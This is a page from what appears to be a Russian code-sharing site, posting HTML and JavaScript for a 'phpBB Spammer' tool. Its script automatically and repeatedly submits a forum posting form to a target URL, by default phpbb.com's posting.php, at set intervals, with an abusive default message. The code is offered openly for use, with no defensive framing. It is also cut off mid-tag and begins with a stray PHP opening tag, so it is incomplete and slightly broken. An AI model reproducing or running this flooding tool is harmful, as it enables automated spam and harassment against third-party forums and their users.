Просмотр кода
Название: phpBB2 Forum spammer
Описание: phpBB2 Forum spammer
Добавил: DELETED
Дата: 16 мар 2015, в 10:42 Комментарии (0)
Описание: phpBB2 Forum spammer
<?php
<html><head>
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>phpBB Spammer</title>
<script type="text/javascript">
<!--
function submitForm(counter)
{
document.title = 'phpBB Spammer' + counter + ' topics posted';
if(document.docform.script_on.value == '1')
{
document.docform.action = document.docform.target.value;
document.docform.submit();
counter++;
}
document.getElementById('counterspan').innerHTML = counter;
setTimeout("submitForm(" + counter + ")", document.docform.intervals.value * 1000);
}
function onOff()
{
if(document.docform.script_on.value == '1')
{
document.docform.script_on.value = '0';
document.docform.stopstart.value = 'Start!';
}
else
{
document.docform.script_on.value = '1';
document.docform.stopstart.value = 'Stop!';
}
}
//-Arrow
</script>
</head><body onload="submitForm(0)" style="font-family: Verdana; font-size: 8pt; font-style: italic;">
<form name="docform" enctype="multipart/form-data" action="" method="post" target="iframe">
<div align="left">
<table style="border-collapse: collapse;" id="AutoNumber1" bgcolor="#dee9f3" border="1" bordercolor="#c0c0c0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td colspan="2" bgcolor="#c4d8ea">
<h1 align="center">
<span style="font-style: italic; text-decoration: underline;">Afterlife's phpBB Spammer!</span></h1>
</td>
</tr>
<tr>
<td width="54%"><i><font size="1"> Intervals (seconds)</font></i></td>
<td width="46%"><font size="1"><input name="intervals" size="57" value="30" type="text"></font></td>
</tr>
<tr>
<td width="54%"><i><font size="1"> Forum ID (This can be found in the forum url, in the url
you will see viewforum.php?f={num}, the number is the id.)</font></i></td>
<td width="46%"><font size="1"><input name="f" size="57" type="text"></font></td>
</tr>
<tr>
<td width="54%"><i><font size="1"> Target</font></i></td>
<td width="46%">
<font size="1">
<input name="target" size="57" value="http://www.phpbb.com/phpBB/posting.php" type="text"></font></td>
</tr>
<tr>
<td width="54%"><i><font size="1"> Topic Title</font></i></td>
<td width="46%">
<font size="1">
<input name="subject" size="57" value="Spam!" type="text"></font></td>
</tr>
<tr>
<td width="54%"><i><font size="1"> Topic Content</font></i></td>
<td width="46%">
<font size="1">
<textarea rows="5" name="message" cols="48">You are being spammed bitch!</textarea></font>&l
Добавил: DELETED
Дата: 16 мар 2015, в 10:42 Комментарии (0)